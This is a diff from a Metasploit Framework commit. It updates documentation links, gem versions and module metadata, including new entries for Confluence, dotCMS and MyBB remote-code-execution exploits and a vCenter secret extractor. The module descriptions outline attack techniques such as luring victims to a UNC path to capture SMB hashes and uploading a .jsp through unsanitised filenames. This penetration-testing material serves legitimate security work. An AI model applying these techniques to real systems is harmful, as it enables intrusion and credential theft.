automatic module_metadata_base.json update

Land #16676 , Add 6th getsystem technique
Update metasploit payloads to 2.0.94
2022-06-23 14:36:44 -05:00 · 2022-06-23 15:14:52 -04:00 · 2022-06-23 18:46:51 +02:00 · 2022-06-23 18:43:18 +02:00 · 2022-06-21 18:22:22 -05:00 · 2022-06-21 17:56:32 -05:00
106 changed files with 3730 additions and 724 deletions
@@ -8,8 +8,8 @@ labels: "bug"
  Please fill out each section below, otherwise, your issue will be closed. This info allows Metasploit maintainers to diagnose (and fix!) your issue as quickly as possible.

  Useful Links:
-  - Wiki: https://github.com/rapid7/metasploit-framework/wiki
-  - Reporting a Bug: https://github.com/rapid7/metasploit-framework/wiki/Reporting-a-Bug
+  - Wiki: https://docs.metasploit.com/
+  - Reporting a Bug: https://docs.metasploit.com/docs/using-metasploit/getting-started/reporting-a-bug.html

  Before opening a new issue, please search existing issues: https://github.com/rapid7/metasploit-framework/issues
 -->
@@ -8,7 +8,7 @@ labels: "suggestion-docs"
  To make it easier for us to help you, please include as much useful information as possible.

  Useful Links:
-  - Wiki: https://github.com/rapid7/metasploit-framework/wiki
+  - Wiki: https://docs.metasploit.com/

  Before opening a new issue, please search existing issues https://github.com/rapid7/metasploit-framework/issues
 -->
@@ -33,7 +33,7 @@ Why should we document this and who will benefit from it?
 ### Draft the doc

 - [ ] Write the doc, following the format listed in these resources:
-  - [Overview on contributing module documentation](https://github.com/rapid7/metasploit-framework/wiki/Writing-Module-Documentation)
+  - [Overview on contributing module documentation](https://docs.metasploit.com/docs/development/quality/writing-module-documentation.html)
  - [Docs Templates](https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/module_doc_template.md)
  - [Example of a similar article]()

@@ -8,7 +8,7 @@ labels: "suggestion-feature"
  To make it easier for us to help you, please include as much useful information as possible.

  Useful Links:
-  - Wiki: https://github.com/rapid7/metasploit-framework/wiki
+  - Wiki: https://docs.metasploit.com/

  Before opening a new issue, please search existing issues https://github.com/rapid7/metasploit-framework/issues
 -->
@@ -8,7 +8,7 @@ labels: "suggestion-module"
  To make it easier for us to help you, please include as much useful information as possible.

  Useful Links:
-  - Wiki: https://github.com/rapid7/metasploit-framework/wiki
+  - Wiki: https://docs.metasploit.com/

  Before opening a new issue, please search existing issues https://github.com/rapid7/metasploit-framework/issues
 -->
@@ -8,7 +8,7 @@ labels: "question"
  To make it easier for us to help you, please include as much useful information as possible.

  Useful Links:
-  - Wiki: https://github.com/rapid7/metasploit-framework/wiki
+  - Wiki: https://docs.metasploit.com/

  Before opening a new issue, please search existing issues https://github.com/rapid7/metasploit-framework/issues
 -->
@@ -31,4 +31,4 @@ Complex Software Examples:
 We will also accept demonstrations of successful module execution even if your module doesn't meet the above conditions. It's not a necessity, but it may help us land your module faster!

 Demonstration of successful module execution can take the form of a packet capture (pcap) or a screen recording. You can send pcaps and recordings to [msfdev@metasploit.com](mailto:msfdev@metasploit.com). Please include a CVE number in the subject header (if applicable), and a link to your PR in the email body.
-If you wish to sanitize your pcap, please see the [wiki](https://github.com/rapid7/metasploit-framework/wiki/Sanitizing-PCAPs).
+If you wish to sanitize your pcap, please see the [wiki](https://docs.metasploit.com/docs/development/get-started/sanitizing-pcaps.html).
@@ -1,7 +1,7 @@
 PATH
  remote: .
  specs:
-    metasploit-framework (6.2.0)
+    metasploit-framework (6.2.4)
      actionpack (~> 6.0)
      activerecord (~> 6.0)
      activesupport (~> 6.0)
@@ -18,6 +18,7 @@ PATH
      eventmachine
      faker
      faraday
+      faraday-retry
      faye-websocket
      filesize
      hrr_rb_ssh-ed25519
@@ -29,7 +30,7 @@ PATH
      metasploit-concern
      metasploit-credential
      metasploit-model
-      metasploit-payloads (= 2.0.87)
+      metasploit-payloads (= 2.0.94)
      metasploit_data_models
      metasploit_payloads-mettle (= 1.0.18)
      mqtt
@@ -128,16 +129,16 @@ GEM
      activerecord (>= 3.1.0, < 8)
    ast (2.4.2)
    aws-eventstream (1.2.0)
-    aws-partitions (1.588.0)
-    aws-sdk-core (3.131.0)
+    aws-partitions (1.598.0)
+    aws-sdk-core (3.131.1)
      aws-eventstream (~> 1, >= 1.0.2)
      aws-partitions (~> 1, >= 1.525.0)
      aws-sigv4 (~> 1.1)
-      jmespath (~> 1.0)
-    aws-sdk-ec2 (1.315.0)
+      jmespath (~> 1, >= 1.6.1)
+    aws-sdk-ec2 (1.317.0)
      aws-sdk-core (~> 3, >= 3.127.0)
      aws-sigv4 (~> 1.1)
-    aws-sdk-iam (1.68.0)
+    aws-sdk-iam (1.69.0)
      aws-sdk-core (~> 3, >= 3.127.0)
      aws-sigv4 (~> 1.1)
    aws-sdk-kms (1.57.0)
@@ -185,28 +186,10 @@ GEM
      railties (>= 5.0.0)
    faker (2.21.0)
      i18n (>= 1.8.11, < 2)
-    faraday (1.10.0)
-      faraday-em_http (~> 1.0)
-      faraday-em_synchrony (~> 1.0)
-      faraday-excon (~> 1.1)
-      faraday-httpclient (~> 1.0)
-      faraday-multipart (~> 1.0)
-      faraday-net_http (~> 1.0)
-      faraday-net_http_persistent (~> 1.0)
-      faraday-patron (~> 1.0)
-      faraday-rack (~> 1.0)
-      faraday-retry (~> 1.0)
+    faraday (2.3.0)
+      faraday-net_http (~> 2.0)
      ruby2_keywords (>= 0.0.4)
-    faraday-em_http (1.0.0)
-    faraday-em_synchrony (1.0.0)
-    faraday-excon (1.1.0)
-    faraday-httpclient (1.0.1)
-    faraday-multipart (1.0.3)
-      multipart-post (>= 1.2, < 3)
-    faraday-net_http (1.0.1)
-    faraday-net_http_persistent (1.2.0)
-    faraday-patron (1.0.0)
-    faraday-rack (1.0.0)
+    faraday-net_http (2.0.3)
    faraday-retry (1.0.3)
    faye-websocket (0.11.1)
      eventmachine (>= 0.12.0)
@@ -224,7 +207,7 @@ GEM
    hrr_rb_ssh-ed25519 (0.4.2)
      ed25519 (~> 1.2)
      hrr_rb_ssh (>= 0.4)
-    http-cookie (1.0.4)
+    http-cookie (1.0.5)
      domain_name (~> 0.5)
    http_parser.rb (0.8.0)
    httpclient (2.8.3)
@@ -238,7 +221,7 @@ GEM
      rkelly-remix
    json (2.6.2)
    little-plugger (1.1.4)
-    logging (2.3.0)
+    logging (2.3.1)
      little-plugger (~> 1.1)
      multi_json (~> 1.14)
    loofah (2.18.0)
@@ -264,7 +247,7 @@ GEM
      activemodel (~> 6.0)
      activesupport (~> 6.0)
      railties (~> 6.0)
-    metasploit-payloads (2.0.87)
+    metasploit-payloads (2.0.94)
    metasploit_data_models (5.0.5)
      activerecord (~> 6.0)
      activesupport (~> 6.0)
@@ -280,13 +263,12 @@ GEM
    mini_portile2 (2.8.0)
    minitest (5.15.0)
    mqtt (0.5.0)
-    msgpack (1.5.1)
+    msgpack (1.5.2)
    multi_json (1.15.0)
-    multipart-post (2.1.1)
    mustermann (1.1.1)
      ruby2_keywords (~> 0.0.1)
    nessus_rest (0.1.6)
-    net-ldap (0.17.0)
+    net-ldap (0.17.1)
    net-protocol (0.1.3)
      timeout
    net-smtp (0.3.1)
@@ -301,9 +283,9 @@ GEM
      mini_portile2 (~> 2.8.0)
      racc (~> 1.4)
    nori (2.6.0)
-    octokit (4.22.0)
-      faraday (>= 0.9)
-      sawyer (~> 0.8.0, >= 0.5.3)
+    octokit (4.24.0)
+      faraday (>= 1, < 3)
+      sawyer (~> 0.9)
    openssl-ccm (1.2.2)
    openssl-cmac (2.0.1)
    openvas-omp (0.0.4)
@@ -331,7 +313,7 @@ GEM
    puma (5.6.4)
      nio4r (~> 2.0)
    racc (1.6.0)
-    rack (2.2.3)
+    rack (2.2.3.1)
    rack-protection (2.2.0)
      rack
    rack-test (1.1.0)
@@ -339,7 +321,7 @@ GEM
    rails-dom-testing (2.0.3)
      activesupport (>= 4.2.0)
      nokogiri (>= 1.6)
-    rails-html-sanitizer (1.4.2)
+    rails-html-sanitizer (1.4.3)
      loofah (~> 2.3)
    railties (6.1.6)
      actionpack (= 6.1.6)
@@ -353,7 +335,7 @@ GEM
    recog (2.3.23)
      nokogiri
    redcarpet (3.5.1)
-    regexp_parser (2.4.0)
+    regexp_parser (2.5.0)
    reline (0.2.5)
      io-console (~> 0.5)
    rex-arch (0.1.14)
@@ -429,13 +411,13 @@ GEM
    rspec-rerun (1.1.0)
      rspec (~> 3.0)
    rspec-support (3.11.0)
-    rubocop (1.29.1)
+    rubocop (1.30.1)
      parallel (~> 1.10)
      parser (>= 3.1.0.0)
      rainbow (>= 2.2.2, < 4.0)
      regexp_parser (>= 1.8, < 3.0)
      rexml (>= 3.2.5, < 4.0)
-      rubocop-ast (>= 1.17.0, < 2.0)
+      rubocop-ast (>= 1.18.0, < 2.0)
      ruby-progressbar (~> 1.7)
      unicode-display_width (>= 1.4.0, < 3.0)
    rubocop-ast (1.18.0)
@@ -453,9 +435,9 @@ GEM
      windows_error (>= 0.1.4)
    rubyntlm (0.6.3)
    rubyzip (2.3.2)
-    sawyer (0.8.2)
+    sawyer (0.9.2)
      addressable (>= 2.3.5)
-      faraday (> 0.8, < 2.0)
+      faraday (>= 0.17.3, < 3)
    simplecov (0.18.2)
      docile (~> 1.1)
      simplecov-html (~> 0.11)
@@ -477,7 +459,7 @@ GEM
    thor (1.2.1)
    tilt (2.0.10)
    timecop (0.9.5)
-    timeout (0.2.0)
+    timeout (0.3.0)
    ttfunk (1.7.0)
    tzinfo (2.0.4)
      concurrent-ruby (~> 1.0)
@@ -485,7 +467,7 @@ GEM
      tzinfo (>= 1.0.0)
    unf (0.1.4)
      unf_ext
-    unf_ext (0.0.8.1)
+    unf_ext (0.0.8.2)
    unicode-display_width (2.1.0)
    unix-crypt (1.3.0)
    warden (1.2.9)
@@ -510,7 +492,7 @@ GEM
      activesupport (>= 4.2, < 8.0)
    xmlrpc (0.3.2)
      webrick
-    yard (0.9.27)
+    yard (0.9.28)
      webrick (~> 1.7.0)
    zeitwerk (2.5.4)

@@ -10,14 +10,14 @@ afm, 0.2.2, MIT
 arel-helpers, 2.14.0, MIT
 ast, 2.4.2, MIT
 aws-eventstream, 1.2.0, "Apache 2.0"
-aws-partitions, 1.587.0, "Apache 2.0"
-aws-sdk-core, 3.130.2, "Apache 2.0"
-aws-sdk-ec2, 1.314.0, "Apache 2.0"
-aws-sdk-iam, 1.68.0, "Apache 2.0"
-aws-sdk-kms, 1.56.0, "Apache 2.0"
+aws-partitions, 1.598.0, "Apache 2.0"
+aws-sdk-core, 3.131.1, "Apache 2.0"
+aws-sdk-ec2, 1.317.0, "Apache 2.0"
+aws-sdk-iam, 1.69.0, "Apache 2.0"
+aws-sdk-kms, 1.57.0, "Apache 2.0"
 aws-sdk-s3, 1.114.0, "Apache 2.0"
 aws-sigv4, 1.5.0, "Apache 2.0"
-bcrypt, 3.1.17, MIT
+bcrypt, 3.1.18, MIT
 bcrypt_pbkdf, 1.1.0, MIT
 bindata, 2.4.10, ruby
 bson, 4.15.0, "Apache 2.0"
@@ -41,17 +41,9 @@ erubi, 1.10.0, MIT
 eventmachine, 1.2.7, "ruby, GPL-2.0"
 factory_bot, 6.2.1, MIT
 factory_bot_rails, 6.2.0, MIT
-faker, 2.20.0, MIT
-faraday, 1.10.0, MIT
-faraday-em_http, 1.0.0, MIT
-faraday-em_synchrony, 1.0.0, MIT
-faraday-excon, 1.1.0, MIT
-faraday-httpclient, 1.0.1, MIT
-faraday-multipart, 1.0.3, MIT
-faraday-net_http, 1.0.1, MIT
-faraday-net_http_persistent, 1.2.0, MIT
-faraday-patron, 1.0.0, MIT
-faraday-rack, 1.0.0, MIT
+faker, 2.21.0, MIT
+faraday, 2.3.0, MIT
+faraday-net_http, 2.0.3, MIT
 faraday-retry, 1.0.3, MIT
 faye-websocket, 0.11.1, "Apache 2.0"
 ffi, 1.15.5, "New BSD"
@@ -62,7 +54,7 @@ gyoku, 1.4.0, MIT
 hashery, 2.1.2, "Simplified BSD"
 hrr_rb_ssh, 0.4.2, "Apache 2.0"
 hrr_rb_ssh-ed25519, 0.4.2, "Apache 2.0"
-http-cookie, 1.0.4, MIT
+http-cookie, 1.0.5, MIT
 http_parser.rb, 0.8.0, MIT
 httpclient, 2.8.3, ruby
 i18n, 1.10.0, MIT
@@ -70,29 +62,28 @@ io-console, 0.5.11, "ruby, Simplified BSD"
 irb, 1.3.6, "ruby, Simplified BSD"
 jmespath, 1.6.1, "Apache 2.0"
 jsobfu, 0.4.2, "New BSD"
-json, 2.6.1, ruby
+json, 2.6.2, ruby
 little-plugger, 1.1.4, MIT
-logging, 2.3.0, MIT
+logging, 2.3.1, MIT
 loofah, 2.18.0, MIT
 memory_profiler, 1.0.0, MIT
 metasm, 1.0.5, LGPL-2.1
 metasploit-concern, 4.0.4, "New BSD"
 metasploit-credential, 5.0.7, "New BSD"
-metasploit-framework, 6.1.44, "New BSD"
+metasploit-framework, 6.2.4, "New BSD"
 metasploit-model, 4.0.4, "New BSD"
-metasploit-payloads, 2.0.87, "3-clause (or ""modified"") BSD"
+metasploit-payloads, 2.0.93, "3-clause (or ""modified"") BSD"
 metasploit_data_models, 5.0.5, "New BSD"
 metasploit_payloads-mettle, 1.0.18, "3-clause (or ""modified"") BSD"
 method_source, 1.0.0, MIT
 mini_portile2, 2.8.0, MIT
 minitest, 5.15.0, MIT
 mqtt, 0.5.0, MIT
-msgpack, 1.5.1, "Apache 2.0"
+msgpack, 1.5.2, "Apache 2.0"
 multi_json, 1.15.0, MIT
-multipart-post, 2.1.1, MIT
 mustermann, 1.1.1, MIT
 nessus_rest, 0.1.6, MIT
-net-ldap, 0.17.0, MIT
+net-ldap, 0.17.1, MIT
 net-protocol, 0.1.3, "ruby, Simplified BSD"
 net-smtp, 0.3.1, "ruby, Simplified BSD"
 net-ssh, 6.1.0, MIT
@@ -101,7 +92,7 @@ nexpose, 7.3.0, "New BSD"
 nio4r, 2.5.8, MIT
 nokogiri, 1.13.6, MIT
 nori, 2.6.0, MIT
-octokit, 4.22.0, MIT
+octokit, 4.24.0, MIT
 openssl-ccm, 1.2.2, MIT
 openssl-cmac, 2.0.1, MIT
 openvas-omp, 0.0.4, MIT
@@ -117,18 +108,18 @@ pry-byebug, 3.9.0, MIT
 public_suffix, 4.0.7, MIT
 puma, 5.6.4, "New BSD"
 racc, 1.6.0, "ruby, Simplified BSD"
-rack, 2.2.3, MIT
+rack, 2.2.3.1, MIT
 rack-protection, 2.2.0, MIT
 rack-test, 1.1.0, MIT
 rails-dom-testing, 2.0.3, MIT
-rails-html-sanitizer, 1.4.2, MIT
+rails-html-sanitizer, 1.4.3, MIT
 railties, 6.1.6, MIT
 rainbow, 3.1.1, MIT
 rake, 13.0.6, MIT
 rb-readline, 0.5.5, BSD
 recog, 2.3.23, unknown
 redcarpet, 3.5.1, MIT
-regexp_parser, 2.4.0, MIT
+regexp_parser, 2.5.0, MIT
 reline, 0.2.5, ruby
 rex-arch, 0.1.14, "New BSD"
 rex-bin_tools, 0.1.8, "New BSD"
@@ -157,17 +148,17 @@ rspec-mocks, 3.11.1, MIT
 rspec-rails, 5.1.2, MIT
 rspec-rerun, 1.1.0, MIT
 rspec-support, 3.11.0, MIT
-rubocop, 1.29.1, MIT
-rubocop-ast, 1.17.0, MIT
+rubocop, 1.30.1, MIT
+rubocop-ast, 1.18.0, MIT
 ruby-macho, 3.0.0, MIT
 ruby-prof, 1.4.2, "Simplified BSD"
 ruby-progressbar, 1.11.0, MIT
 ruby-rc4, 0.1.5, MIT
 ruby2_keywords, 0.0.5, "ruby, Simplified BSD"
-ruby_smb, 3.1.2, "New BSD"
+ruby_smb, 3.1.3, "New BSD"
 rubyntlm, 0.6.3, MIT
 rubyzip, 2.3.2, "Simplified BSD"
-sawyer, 0.8.2, MIT
+sawyer, 0.9.2, MIT
 simplecov, 0.18.2, MIT
 simplecov-html, 0.12.3, MIT
 simpleidn, 0.2.1, MIT
@@ -179,12 +170,12 @@ thin, 1.8.1, "GPL-2.0+, ruby"
 thor, 1.2.1, MIT
 tilt, 2.0.10, MIT
 timecop, 0.9.5, MIT
-timeout, 0.2.0, "ruby, Simplified BSD"
+timeout, 0.3.0, "ruby, Simplified BSD"
 ttfunk, 1.7.0, "Nonstandard, GPL-2.0, GPL-3.0"
 tzinfo, 2.0.4, MIT
 tzinfo-data, 1.2022.1, MIT
 unf, 0.1.4, "2-clause BSDL"
-unf_ext, 0.0.8.1, MIT
+unf_ext, 0.0.8.2, MIT
 unicode-display_width, 2.1.0, MIT
 unix-crypt, 1.3.0, BSD
 warden, 1.2.9, MIT
@@ -196,5 +187,5 @@ windows_error, 0.1.4, BSD
 winrm, 2.3.6, "Apache 2.0"
 xdr, 3.0.3, "Apache 2.0"
 xmlrpc, 0.3.2, "ruby, Simplified BSD"
-yard, 0.9.27, MIT
+yard, 0.9.28, MIT
 zeitwerk, 2.5.4, MIT
@@ -4468,8 +4468,7 @@
    ],
    "description": "This module exploits an unauthenticated arbitrary wordpress options change vulnerability\n          in the Automatic (wp-automatic) plugin <= 3.53.2. If WPEMAIL is provided, the administrator's email\n          address will be changed. User registration is\n          enabled, and default user role is set to administrator. A user is then created with\n          the USER name set. A valid EMAIL is required to get the registration email (not handled in MSF).",
    "references": [
-      "URL-https://blog.nintechnet.com/critical-vulnerability-fixed-in-wordpress-automatic-plugin/",
-      "NOCVE-Patched in 3.53.3 without vendor disclosure"
+      "URL-https://blog.nintechnet.com/critical-vulnerability-fixed-in-wordpress-automatic-plugin/"
    ],
    "platform": "PHP",
    "arch": "php",
@@ -4490,7 +4489,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2021-11-04 15:28:05 +0000",
+    "mod_time": "2022-06-10 14:01:57 +0000",
    "path": "/modules/auxiliary/admin/http/wp_automatic_plugin_privesc.rb",
    "is_install_path": true,
    "ref_name": "admin/http/wp_automatic_plugin_privesc",
@@ -4507,6 +4506,9 @@
      "SideEffects": [
        "config-changes",
        "ioc-in-logs"
+      ],
+      "NOCVE": [
+        "Patched in 3.53.3 without vendor disclosure"
      ]
    },
    "session_types": false,
@@ -4649,7 +4651,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2022-06-10 14:01:57 +0000",
    "path": "/modules/auxiliary/admin/http/wp_gdpr_compliance_privesc.rb",
    "is_install_path": true,
    "ref_name": "admin/http/wp_gdpr_compliance_privesc",
@@ -4657,6 +4659,12 @@
    "post_auth": true,
    "default_credential": false,
    "notes": {
+      "Stability": [
+
+      ],
+      "Reliability": [
+
+      ],
      "SideEffects": [
        "config-changes"
      ]
@@ -8854,6 +8862,53 @@
    "session_types": false,
    "needs_cleanup": false
  },
+  "auxiliary_admin/vmware/vcenter_offline_mdb_extract": {
+    "name": "VMware vCenter Extract Secrets from vmdir / vmafd DB File",
+    "fullname": "auxiliary/admin/vmware/vcenter_offline_mdb_extract",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": "2022-05-10",
+    "type": "auxiliary",
+    "author": [
+      "npm <npm@cesium137.io>"
+    ],
+    "description": "Grab certificates from the vCenter server vmdird and vmafd\n          database files and adds them to loot. The vmdird MDB database file\n          can be found on the live appliance under the path\n          /storage/db/vmware-vmdir/data.mdb, and the DB vmafd is under path\n          /storage/db/vmware-vmafd/afd.db. The vmdir database contains the\n          IdP signing credential, and vmafd contains the vCenter certificate\n          store. This module will accept either file from a live vCenter\n          appliance, or from a vCenter appliance backup archive; either or\n          both files can be supplied.",
+    "references": [
+      "URL-https://www.horizon3.ai/compromising-vcenter-via-saml-certificates/"
+    ],
+    "platform": "Linux",
+    "arch": "",
+    "rport": null,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": null,
+    "mod_time": "2022-05-26 11:52:56 +0000",
+    "path": "/modules/auxiliary/admin/vmware/vcenter_offline_mdb_extract.rb",
+    "is_install_path": true,
+    "ref_name": "admin/vmware/vcenter_offline_mdb_extract",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
  "auxiliary_admin/vnc/realvnc_41_bypass": {
    "name": "RealVNC NULL Authentication Mode Bypass",
    "fullname": "auxiliary/admin/vnc/realvnc_41_bypass",
@@ -16681,7 +16736,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2021-11-11 11:37:55 +0000",
+    "mod_time": "2022-05-06 00:22:52 +0000",
    "path": "/modules/auxiliary/gather/billquick_txtid_sqli.rb",
    "is_install_path": true,
    "ref_name": "gather/billquick_txtid_sqli",
@@ -18715,7 +18770,7 @@

    ],
    "targets": null,
-    "mod_time": "2022-05-16 12:03:24 +0000",
+    "mod_time": "2022-06-08 11:53:42 +0000",
    "path": "/modules/auxiliary/gather/impersonate_ssl.rb",
    "is_install_path": true,
    "ref_name": "gather/impersonate_ssl",
@@ -39835,7 +39890,7 @@

    ],
    "targets": null,
-    "mod_time": "2022-01-23 15:28:32 +0000",
+    "mod_time": "2022-05-30 13:03:03 +0000",
    "path": "/modules/auxiliary/scanner/nfs/nfsmount.rb",
    "is_install_path": true,
    "ref_name": "scanner/nfs/nfsmount",
@@ -49779,7 +49834,7 @@
      "agalway-r7",
      "sjanusz-r7"
    ],
-    "description": "This module provides a SMB service that can be used to capture the challenge-response\n        password NTLMv1 & NTLMv2 hashes used with SMB1, SMB2, or SMB3 client systems.\n        Responses sent by this service have by default a random 8 byte challenge string\n        of format `\\x11\\x22\\x33\\x44\\x55\\x66\\x77\\x88`, allowing for easy cracking using\n        Cain & Abel (NTLMv1) or John the ripper (with jumbo patch).\n\n        To exploit this, the target system must try to authenticate to this\n        module. One way to force an SMB authentication attempt is by embedding\n        a UNC path (\\\\SERVER\\SHARE) into a web page or email message. When\n        the victim views the web page or email, their system will\n        automatically connect to the server specified in the UNC share (the IP\n        address of the system running this module) and attempt to\n        authenticate. Another option is using auxiliary/spoof/{nbns,llmnr} to\n        respond to queries for names the victim is already looking for.\n\n        Documentation of the above spoofing methods can be found by running `info -d`.",
+    "description": "This module provides a SMB service that can be used to capture the challenge-response\n        password NTLMv1 & NTLMv2 hashes used with SMB1, SMB2, or SMB3 client systems.\n        Responses sent by this service by default use a random 8 byte challenge string.\n        A specific value (such as `1122334455667788`) can be set using the CHALLENGE option,\n        allowing for easy cracking using Cain & Abel (NTLMv1) or John the Ripper\n        (with jumbo patch).\n\n        To exploit this, the target system must try to authenticate to this\n        module. One way to force an SMB authentication attempt is by embedding\n        a UNC path (\\\\SERVER\\SHARE) into a web page or email message. When\n        the victim views the web page or email, their system will\n        automatically connect to the server specified in the UNC share (the IP\n        address of the system running this module) and attempt to\n        authenticate. Another option is using auxiliary/spoof/{nbns,llmnr} to\n        respond to queries for names the victim is already looking for.\n\n        Documentation of the above spoofing methods can be found by running `info -d`.",
    "references": [

    ],
@@ -49793,7 +49848,7 @@

    ],
    "targets": null,
-    "mod_time": "2022-04-21 11:24:15 +0000",
+    "mod_time": "2022-05-27 14:41:06 +0000",
    "path": "/modules/auxiliary/server/capture/smb.rb",
    "is_install_path": true,
    "ref_name": "server/capture/smb",
@@ -73032,7 +73087,7 @@
    "targets": [
      "Cisco RV340 Firmware Version <= 1.0.03.24"
    ],
-    "mod_time": "2022-05-11 18:30:11 +0000",
+    "mod_time": "2022-06-10 14:01:57 +0000",
    "path": "/modules/exploits/linux/misc/cisco_rv340_sslvpn.rb",
    "is_install_path": true,
    "ref_name": "linux/misc/cisco_rv340_sslvpn",
@@ -73040,9 +73095,15 @@
    "post_auth": false,
    "default_credential": false,
    "notes": {
-      "Stability": "crash-service-restarts",
-      "Reliability": "repeatable-session",
-      "SideEffects": null
+      "Stability": [
+        "crash-service-restarts"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+
+      ]
    },
    "session_types": false,
    "needs_cleanup": null
@@ -80542,6 +80603,75 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_multi/http/atlassian_confluence_namespace_ognl_injection": {
+    "name": "Atlassian Confluence Namespace OGNL Injection",
+    "fullname": "exploit/multi/http/atlassian_confluence_namespace_ognl_injection",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2022-06-02",
+    "type": "exploit",
+    "author": [
+      "Unknown",
+      "bturner-r7",
+      "jbaines-r7",
+      "Spencer McIntyre"
+    ],
+    "description": "This module exploits an OGNL injection in Atlassian Confluence servers. A specially crafted URI can be used to\n          evaluate an OGNL expression resulting in OS command execution.",
+    "references": [
+      "CVE-2022-26134",
+      "URL-https://jira.atlassian.com/browse/CONFSERVER-79000?src=confmacro",
+      "URL-https://gist.githubusercontent.com/bturner-r7/1d0b62fac85235b94f1c95cc4c03fcf3/raw/478e53b6f68b5150eefd53e0956f23d53618d250/confluence-exploit.py",
+      "URL-https://github.com/jbaines-r7/through_the_wire",
+      "URL-https://attackerkb.com/topics/BH1D56ZEhs/cve-2022-26134/rapid7-analysis"
+    ],
+    "platform": "Linux,Unix,Windows",
+    "arch": "cmd, x86, x64",
+    "rport": 8090,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Unix Command",
+      "Linux Dropper",
+      "Windows Command",
+      "Windows Dropper"
+    ],
+    "mod_time": "2022-06-15 17:11:56 +0000",
+    "path": "/modules/exploits/multi/http/atlassian_confluence_namespace_ognl_injection.rb",
+    "is_install_path": true,
+    "ref_name": "multi/http/atlassian_confluence_namespace_ognl_injection",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs",
+        "artifacts-on-disk"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_multi/http/atlassian_confluence_webwork_ognl_injection": {
    "name": "Atlassian Confluence WebWork OGNL Injection",
    "fullname": "exploit/multi/http/atlassian_confluence_webwork_ognl_injection",
@@ -81913,6 +82043,69 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_multi/http/dotcms_file_upload_rce": {
+    "name": "DotCMS RCE via Arbitrary File Upload.",
+    "fullname": "exploit/multi/http/dotcms_file_upload_rce",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2022-05-03",
+    "type": "exploit",
+    "author": [
+      "Shubham Shah",
+      "Hussein Daher",
+      "jheysel-r7"
+    ],
+    "description": "When files are uploaded into dotCMS via the content API, but before they become content, dotCMS writes the\n          file down in a temp directory.  In the case of this vulnerability, dotCMS does not sanitize the filename\n          passed in via the multipart request header and thus does not sanitize the temp file's name.  This allows a\n          specially crafted request to POST files to dotCMS via the ContentResource (POST /api/content)  that get\n          written outside of the dotCMS temp directory.  In the case of this exploit, an attacker can upload a special\n          .jsp file to the webapp/ROOT directory of dotCMS which can allow for remote code execution.",
+    "references": [
+      "CVE-2022-26352",
+      "URL-https://blog.assetnote.io/2022/05/03/hacking-a-bank-using-dotcms-rce/"
+    ],
+    "platform": "Linux,Windows",
+    "arch": "",
+    "rport": 8443,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Java Linux",
+      "Java Windows"
+    ],
+    "mod_time": "2022-06-01 10:54:02 +0000",
+    "path": "/modules/exploits/multi/http/dotcms_file_upload_rce.rb",
+    "is_install_path": true,
+    "ref_name": "multi/http/dotcms_file_upload_rce",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk",
+        "ioc-in-logs"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": true
+  },
  "exploit_multi/http/drupal_drupageddon": {
    "name": "Drupal HTTP Parameter Key/Value SQL Injection",
    "fullname": "exploit/multi/http/drupal_drupageddon",
@@ -85958,6 +86151,74 @@
    "session_types": false,
    "needs_cleanup": true
  },
+  "exploit_multi/http/mybb_rce_cve_2022_24734": {
+    "name": "MyBB Admin Control Code Injection RCE",
+    "fullname": "exploit/multi/http/mybb_rce_cve_2022_24734",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2022-03-09",
+    "type": "exploit",
+    "author": [
+      "Cillian Collins",
+      "Altelus",
+      "Christophe De La Fuente"
+    ],
+    "description": "This exploit module leverages an improper input validation\n          vulnerability in MyBB prior to `1.8.30` to execute arbitrary code in\n          the context of the user running the application.\n\n          MyBB Admin Control setting page calls PHP `eval` function with an\n          unsanitized user input. The exploit adds a new setting, injecting the\n          payload in the vulnerable field, and triggers its execution with a\n          second request. Finally, it takes care of cleaning up and removes the\n          setting.\n\n          Note that authentication is required for this exploit to work and the\n          account must have rights to add or update settings (typically, myBB\n          administrator role).",
+    "references": [
+      "URL-https://github.com/mybb/mybb/security/advisories/GHSA-876v-gwgh-w57f",
+      "URL-https://www.zerodayinitiative.com/advisories/ZDI-22-503/",
+      "URL-https://github.com/Altelus1/CVE-2022-24734",
+      "CVE-2022-24734"
+    ],
+    "platform": "Linux,PHP,Unix,Windows",
+    "arch": "php, cmd, x86, x64",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
